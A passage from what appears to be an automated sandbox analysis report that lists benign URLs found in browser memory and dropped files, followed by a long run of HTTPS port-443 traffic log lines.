    Source: chrome.exe, 00000010.00000003.3473204332.00004EB40140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3472297843.00004EB40195C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3471502381.00004EB401940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3459581107.00004EB401BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://tidal.com/
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://twitter.com/
    Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.21.drString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
    Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.21.drString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
    Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.21.drString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://vibe.naver.com/today
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://web.telegram.org/
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://web.whatsapp.com
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
    Source: 79HDJ5.11.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
    Source: Verzeichnis.com.2.dr, Corners.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://www.deezer.com/
    Source: Q16P8Y.11.drString found in binary or memory: https://www.ecosia.org/newtab/
    Source: Corners.0.drString found in binary or memory: https://www.globalsign.com/repository/0
    Source: Verzeichnis.com.2.dr, Corners.0.drString found in binary or memory: https://www.globalsign.com/repository/06
    Source: chrome.exe, 00000010.00000003.3412812568.00004EB4004A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
    Source: chrome.exe, 00000010.00000003.3459581107.00004EB401BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/_/og/promos/
    Source: content_new.js.21.dr, content.js.21.drString found in binary or memory: https://www.google.com/chrome
    Source: chrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
    Source: Q16P8Y.11.dr, UAS0ZM.11.dr, Web Data.21.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: chrome.exe, 00000010.00000003.3473204332.00004EB40140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3472297843.00004EB40195C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3471502381.00004EB401940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3459581107.00004EB401BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
    Source: chrome.exe, 00000010.00000003.3459581107.00004EB401BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
    Source: chrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
    Source: chrome.exe, 00000010.00000003.3423267040.00004EB40127C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
    Source: chrome.exe, 00000010.00000003.3459581107.00004EB401BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/url?q=https://google.com/chrome/safety%3Fbrand%3DKFKH%26utm_source%3Dweb%26ut
    Source: chrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
    Source: chrome.exe, 00000010.00000003.3456860063.00004EB4016E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
    Source: chrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
    Source: chrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
    Source: chrome.exe, 00000010.00000003.3471502381.00004EB401940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
    Source: chrome.exe, 00000010.00000003.3463457767.00004EB401CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3473204332.00004EB40140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3458947646.00004EB401C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3472297843.00004EB40195C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3459289421.00004EB401C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3469547468.00004EB401C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3471502381.00004EB401940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
    Source: chrome.exe, 00000010.00000003.3465980522.00004EB401C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3459502033.00004EB401CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3459581107.00004EB401BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.Z8FBMQoacoc.2019.O/rt=j/m=q_d
    Source: chrome.exe, 00000010.00000003.3465980522.00004EB401C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3459502033.00004EB401CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3459581107.00004EB401BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://www.iheart.com/podcast/
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://www.instagram.com
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://www.last.fm/
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://www.messenger.com
    Source: 2cc80dabc69f58b6_1.21.drString found in binary or memory: https://www.msn.com/web-notification-icon-light.png
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://www.office.com
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
    Source: 79HDJ5.11.drString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://www.tiktok.com/
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://www.youtube.com
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://y.music.163.com/m/
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
    Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
    Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
    Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
    Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
    Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
    Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
    Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
    Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
    Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
    Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
    Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
    Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
    Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
    Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
    Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
    Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
